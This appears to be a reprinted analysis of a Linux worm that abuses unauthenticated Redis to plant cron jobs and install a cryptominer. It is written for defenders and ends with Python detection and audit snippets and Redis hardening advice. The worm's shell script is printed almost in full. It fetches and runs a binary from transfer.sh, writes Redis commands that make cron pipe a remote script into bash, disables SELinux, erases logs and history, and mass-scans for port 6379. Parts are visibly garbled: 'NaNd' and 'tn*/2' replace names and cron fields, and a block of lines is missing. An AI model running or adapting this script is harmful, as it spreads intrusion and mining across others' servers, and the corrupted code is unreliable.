
Case analysis of worm infection in Linux Redis automatic mining

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article gives a detailed analysis of a worm that automatically infects Linux servers through Redis and installs a cryptocurrency miner. The content is detailed, the steps are laid out clearly, and the details are handled properly; we hope it helps resolve any doubts you have about this kind of attack.

I. Background

Since the technique for exploiting Redis unauthorized access to obtain root on a Linux system was disclosed, its ease of use has produced a steady stream of attackers using it to break into Linux servers for mining, scanning and so on. Among the cases of this problem being used to compromise servers for the underground economy, one family mines cryptocurrency and uses pnscan to scan for and automatically infect other machines. This kind of attack has existed for a long time, but it has been trending upward lately and we have captured it several times recently, so we present a detailed analysis of it.

II. Vulnerability description

First, an explanation of the exploited vulnerability. By default, Redis binds to 0.0.0.0:6379. If no firewall shields it, the Redis service is exposed to the public network, and if authentication is not enabled, any user who can reach the target server can access Redis and read its data without authorization. With such unauthorized access, an attacker can use Redis's own features to write their public key into the authorized_keys file in the target server's ~/.ssh directory and then log in to the server directly; if the Redis service was started as root, this problem yields root on the server outright.

A search on ZoomEye and SHODAN shows that many Redis services are exposed on the public network, and every one of them is a potential target.

III. Intrusion analysis

After analyzing the captured events, we find that the whole intrusion consists of roughly the following steps:

1. Scan for Linux servers with port 6379 open (the subsequent infection scan covers the network segments 1.0.0.0/16 to 224.255.0.0/16).

2. Connect to Redis with redis-cli and execute the commands preset in the .dat file: these change Redis's data file to /var/spool/cron/root and then, by inserting data into Redis, write a crontab entry that downloads and executes the script.

3. The script carries out the behaviours above, completes the implant and starts the mining program.

4. Compile and install pnscan, and keep scanning for the next target.

IV. Script analysis

The main functionality of the intrusion and of the subsequent propagation lives in the script (https://transfer.sh/MIpIA/tmp.9kIguIhkI7) that the crontab task downloads and executes. Analysing it gives essentially all the details of the whole process. It is a shell script, and we walk through its functions section by section.

1. sleep 1
2. find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete
3. [ -f .mxff0 ] && exit 0
4. echo 0 > .mxff0

This part guards against repeated execution. The .mxff0 file is used as a marker: if it exists (line 2 first deletes it when it is older than 60 minutes), the script has already run on this machine and exits immediately; otherwise it writes .mxff0 and proceeds to the next step.

5. trap "rm -rf .m* NaNd tmp.* .r .dat $0" EXIT

Register a handler that deletes the related files and the script itself when the script exits.

6. setenforce 0 2>/dev/null
7. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
8. crontab -r 2>/dev/null
9. rm -rf /var/spool/cron 2>/dev/null
10. grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf
11. rm -rf /tmp/* 2>/dev/null
12. rm -rf /var/tmp/* 2>/dev/null
13. rm -rf /etc/root.sh 2>/dev/null
14. sync && echo 3 > /proc/sys/vm/drop_caches
15. cat /dev/null

29. rm -rf /var/tmp/* 2>/dev/null
30. echo 0 > /var/spool/mail/root
31. echo 0 > /var/log/wtmp
32. echo 0 > /var/log/secure
33. echo 0 > /root/.bash_history

Clear the login logs and the command history.

34. YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"
35. DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"
36. if cat /etc/*release | grep -i CentOS; then
37. yum clean all
38. yum install -y -q epel-release
39. yum install -y -q $YUM_PACKAGE_NAME
40. elif cat /etc/*release | grep -qi Red; then
41. yum clean all
42. yum install -y -q epel-release
43. yum install -y -q $YUM_PACKAGE_NAME
44. elif cat /etc/*release | grep -qi Fedora; then
45. yum clean all
46. yum install -y -q epel-release
47. yum install -y -q $YUM_PACKAGE_NAME
48. elif cat /etc/*release | grep -qi Ubuntu; then
49. export DEBIAN_FRONTEND=noninteractive
50. rm -rf /var/lib/apt/lists/*
51. apt-get update -q --fix-missing
52. for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
53. elif cat /etc/*release | grep -qi Debian; then
54. export DEBIAN_FRONTEND=noninteractive
55. rm -rf /var/lib/apt/lists/*
56. apt-get update --fix-missing
57. for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
58. elif cat /etc/*release | grep -qi Mint; then
59. export DEBIAN_FRONTEND=noninteractive
60. rm -rf /var/lib/apt/lists/*
61. apt-get update --fix-missing
62. for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
63. elif cat /etc/*release | grep -qi Knoppix; then
64. export DEBIAN_FRONTEND=noninteractive
65. rm -rf /var/lib/apt/lists/*
66. apt-get update --fix-missing
67. for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
68. else
69. exit 1
70. fi
71. sleep 1
72. if ! ([ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ]); then
73. curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12
74. sleep 1
75. [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112
76. fi

The purpose of this long block is to download, compile and install pnscan. It detects the operating system, installs the packages pnscan depends on, then fetches the pnscan source from GitHub and builds and installs it. As for why it compiles from source rather than dropping a binary, our guess is that this both works across different systems and gives each compiled pnscan a different MD5, so that no fixed signature can form.

77. tname=$(mktemp)
78. OMURL=https://transfer.sh/MIpIA/tmp.vOYTgmtZge
79. curl -s $OMURL > $tname || wget -q -O $tname $OMURL
80. NMURL=$(curl -s --upload-file $tname https://transfer.sh)
81. mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

This part downloads the mining program into a temporary file, re-uploads it to https://transfer.sh/ to obtain a new link, then renames it to .gpg, makes it executable, runs it and deletes it after execution.

82. [ -z "$NMURL" ] && NMURL=$OMURL
83. ncmd=$(basename $(mktemp))
84. sed 's|'"$OMURL"'|'"$NMURL"'|g' < NaNd > $ncmd
85. NSURL=$(curl -s --upload-file $ncmd https://transfer.sh)
86. echo 'flushall' > .dat
87. echo 'config set dir /var/spool/cron' >> .dat
88. echo 'config set dbfilename root' >> .dat
89. echo 'set Backup1 "tn*/2 * curl -s '${NSURL}' > NaNd && bash NaNdnt"' >> .dat
90. echo 'set Backup2 "tn*/5 * wget -O NaNd '${NSURL}' && bash NaNdnt"' > .dat
91. echo 'set Backup3 "tn*/10 * lynx -source '${NSURL}' > NaNd && bash NaNdnt"' >> .dat
92. echo 'save' >> .dat
93. echo 'config set dir /var/spool/cron/crontabs' >> .dat
94. echo 'save' >> .dat
95. echo 'exit' >> .dat

The purpose of this part is to generate a new .dat file. The original script (NaNd) has the mining program's download address replaced with the new address obtained by uploading to https://transfer.sh/ in the previous step, and the edited copy is itself re-uploaded; .dat is then filled with the Redis commands that, through the data-file trick, write crontab entries fetching that new script with curl, wget or lynx.
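As an added example that is not from the original article, here is a Python check a defender can run over /var/spool/cron/root (or the crontabs directory) to recognise a file written by the Redis data-file trick described in the intrusion steps and in the .dat section above; the sample file content, URL and file name are constructed, not the worm's real values.

```python
import re

# Constructed sample of /var/spool/cron/root after the worm's
#   config set dir /var/spool/cron ; config set dbfilename root ; save
# The RDB header and framing bytes are approximate; the Backup* values carry
# the cron lines (placeholder URL and file name, not the worm's real ones).
SAMPLE_CRON_FILE = (
    b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\xfb\x03\x00"
    b"\x00\x07Backup1\x50\n\n*/2 * * * * curl -s https://example.invalid/t > .payload && bash .payload\n\n"
    b"\x00\x07Backup2\x50\n\n*/5 * * * * wget -O .payload https://example.invalid/t && bash .payload\n\n"
    b"\x00\x07Backup3\x50\n\n*/10 * * * * lynx -source https://example.invalid/t > .payload && bash .payload\n\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00"
)

# A cron line that fetches something with curl/wget/lynx and hands it to bash.
CRON_LINE = re.compile(rb"^\*/\d+ \* \* \* \* .*?\b(curl|wget|lynx)\b.*?\bbash\b", re.M)


def analyse_cron_file(data: bytes) -> dict:
    """Report indicators that a crontab file was written by Redis 'save'.

    crond rejects the binary lines it cannot parse but still runs the valid
    ones, which is why the RDB framing does not stop the payload from running.
    """
    lines = [m.group(0).decode("latin-1") for m in CRON_LINE.finditer(data)]
    rdb_header = data.startswith(b"REDIS")
    return {
        "rdb_header": rdb_header,
        "lines": lines,
        "suspicious": rdb_header or bool(lines),
    }


def scan_path(path: str) -> dict:
    """Convenience wrapper for a real file, e.g. /var/spool/cron/root."""
    with open(path, "rb") as fh:
        return analyse_cron_file(fh.read())
```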

96. pnx=pnscan
97. [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
98. [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
99. for x in $(seq 1 224 | sort -R); do
100. for y in $(seq 0 255 | sort -R); do
101. $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
102. awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
103. while read -r h p; do
104. cat .dat | redis-cli -h $h -p $p --raw &
105. done < .r.$x.$y.l
106. done
107. done

This step calls pnscan to scan the subnets 1.0.0.0/16 to 224.255.0.0/16 for targets that have port 6379 open and run Linux, then uses redis-cli to execute the commands in .dat against them to infect the next target. The pnscan -W parameter value '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' decodes to '*1\r\n$4\r\nINFO\r\n', a request that asks the target Redis service for the server's information and statistics; the -R parameter value '6f 73 3a 4c 69 6e 75 78' (decoded: os:Linux) is then used to decide whether the target is a Linux system.

108. echo 0 > /var/spool/mail/root 2>/dev/null
109. echo 0 > /var/log/wtmp 2>/dev/null
110. echo 0 > /var/log/secure 2>/dev/null
111. echo 0 > /root/.bash_history 2>/dev/null
112. exit 0

Finally comes the closing work: the script clears the relevant logs and command history once more, and when it exits it triggers the action registered with trap at the beginning, deleting the related files and the script itself (rm -rf .m* NaNd tmp.* .r .dat $0).
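As an added example that is not part of the original analysis, the following Python decodes the two hex strings the script hands to pnscan and parses an INFO reply the way the -R filter does, which is useful when the probe shows up in a packet capture; the INFO reply below is constructed.

```python
# The -W and -R values from the script, copied as given.
PROBE_HEX = "2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a"
MATCH_HEX = "6f 73 3a 4c 69 6e 75 78"


def hex_words_to_bytes(s: str) -> bytes:
    return bytes(int(w, 16) for w in s.split())


def decode_resp_array(buf: bytes) -> list:
    """Minimal RESP parser for an array of bulk strings, e.g. b'*1\\r\\n$4\\r\\ninfo\\r\\n'.

    Redis command names are case-insensitive, so the lower-case 'info' the
    probe sends is the same request as INFO.
    """
    if not buf.startswith(b"*"):
        raise ValueError("not a RESP array")
    head, rest = buf.split(b"\r\n", 1)
    items = []
    for _ in range(int(head[1:])):
        if not rest.startswith(b"$"):
            raise ValueError("expected bulk string")
        lenline, rest = rest.split(b"\r\n", 1)
        n = int(lenline[1:])
        items.append(rest[:n].decode())
        rest = rest[n + 2:]          # skip payload and its trailing \r\n
    return items


def parse_info(reply: str) -> dict:
    """Turn an INFO reply ('# Section' headers, 'key:value' lines) into a dict."""
    out = {}
    for line in reply.splitlines():
        if line and not line.startswith("#") and ":" in line:
            key, value = line.split(":", 1)
            out[key] = value.strip()
    return out


def matches_worm_filter(reply: str) -> bool:
    """True when the reply contains the substring pnscan -R looks for."""
    return hex_words_to_bytes(MATCH_HEX).decode() in reply


# Constructed INFO reply in the real Redis format (values are made up).
SAMPLE_INFO = ("# Server\r\nredis_version:4.0.9\r\n"
               "os:Linux 3.10.0-862.el7.x86_64 x86_64\r\ntcp_port:6379\r\n"
               "# Clients\r\nconnected_clients:1\r\n")
```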

Having read through the script, we now have a basic understanding of the worm's behaviour and the whole intrusion process, which is the process described at the beginning.

In addition, reading the script shows that although the intrusion process is not very complicated, the script attends to a surprising number of "engineering" details, and the intruder's thoroughness is striking:

1. Use the .mxff0 file to detect repeated execution and avoid running the script twice.

2. To raise the success rate, some preparation of the environment:

A) close SELINUX

B) add 8.8.8.8 DNS

C) clear the tmp directory

D) clear the system cache

E) modify system resource limits

3. Trace removal

A) use the trap preset action to delete the related files and the script itself after the script has been executed

B) repeatedly clear logs such as related logins and command execution history

4. Keeping rival intruders out

A) use iptables to stop the Redis port being reachable from the public network, so the host is not re-intruded

B) remove implants that other intruders may have left behind and kill their processes

5. System compatibility

A) detect the operating system and run the matching commands to install the dependency packages, maximizing the chance that pnscan compiles and installs

B) disable SELinux both with setenforce and by editing /etc/sysconfig/selinux

C) the crontab task that downloads and executes the script is implemented three ways, with curl, wget and lynx

D) the pnscan scan includes an operating-system check, reducing pointless infection attempts

6. Signature avoidance, survival and persistence

A) pnscan is compiled from source, which both improves compatibility across systems and avoids a fixed MD5 signature

B) using https://transfer.sh as a relay, a new link is generated for each infection so that no fixed link becomes a signature

C) the files downloaded to the system use randomly generated file names

It is precisely because of all kinds of "thoughtfulness" of the intruder that the success rate of his invasion and infection can reach a certain level.

V. Security recommendations

Virus cleanup and system recovery

Recovery and cleanup can follow the script's behaviours, undoing each one:

1. SELinux was disabled; re-enable it according to the original system environment and business needs.

2. /var/spool/cron was cleared; restore it from the original backup.

3. /etc/resolv.conf was modified to add the DNS server 8.8.8.8; if this has no impact it can be left alone, otherwise remove it.

4. The system resource limits (/etc/security/limits.conf) were modified; restore them from backup where one exists.

5. An iptables rule for port 6379 was added; if it does not affect the business, it is recommended to keep it.

6. Related processes were killed; check whether any processes the business needs were among them and restart them as required.

7. The packages listed above were installed; they can be removed as appropriate or kept if they have no impact.

8. pnscan was compiled and installed; /usr/local/bin/pnscan can be deleted.

9. The relevant logs and tmp directories were cleared; this has no impact on the system and can be ignored.

10. The mining process and the pnscan infection scan were started; kill the .gpg and pnscan processes directly.

There are also intermediate files. Although the script contains deletion steps for them, it is recommended to search the whole system and confirm: .mxff0, .x112, .gpg, .dat, NaNd, .r.xx.xx.o / .r.xx.xx.l, tmp.xxxx

Redis service hardening

1. Unless it is necessary, change the bind entry: do not bind Redis to 0.0.0.0, so that the Redis service is not exposed on the public network. Access can be restricted by source with iptables, or, for Tencent Cloud users, with security groups.

2. Where the business allows, do not start the Redis service as root, and it is recommended to change the default port 6379: most intrusions targeting Redis unauthorized access aim at the default port.

3. Configure AUTH to add password verification, so that even if the service is exposed on the public network, attackers cannot access Redis for these operations unless the password is weak.

4. Use rename-command CONFIG "RENAME_CONFIG" to rename the relevant commands, so that even an attacker who connects to Redis without authorization can at most read data and, not knowing the renamed command, cannot exploit it further.
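As an added example (not from the article), this Python audit parses a redis.conf text and reports which of the hardening points above are missing; the directive names are real Redis ones, the two sample configurations are constructed.

```python
# Constructed weak configuration: public bind, default port, no password,
# CONFIG not renamed.
WEAK_CONF = """
bind 0.0.0.0
port 6379
# requirepass foobared
"""

# Constructed hardened configuration following the four recommendations.
HARDENED_CONF = """
bind 127.0.0.1
port 16379
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG "RENAME_CONFIG"
rename-command FLUSHALL ""
"""


def parse_conf(text: str) -> dict:
    """Map each directive (lower-cased) to the list of its argument lists."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit(text: str) -> list:
    """Return human-readable findings; an empty list means all checks pass."""
    conf = parse_conf(text)
    findings = []
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("bind: reachable on all interfaces; bind to 127.0.0.1 or an internal address")
    if conf.get("port", [["6379"]])[0][0] == "6379":
        findings.append("port: default 6379; the worm scans only this port")
    if "requirepass" not in conf:
        findings.append("requirepass: not set; anyone who can reach the port has full access")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG not renamed; 'config set dir/dbfilename' stays usable")
    return findings
```

The check treats a missing bind or port directive as the Redis defaults (all interfaces, 6379).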

That concludes the article "Case Analysis of a Linux Redis Automatic Mining Worm Infection". To master the points covered here, you still need to practise and apply them yourself. For more related articles, follow the industry information channel.
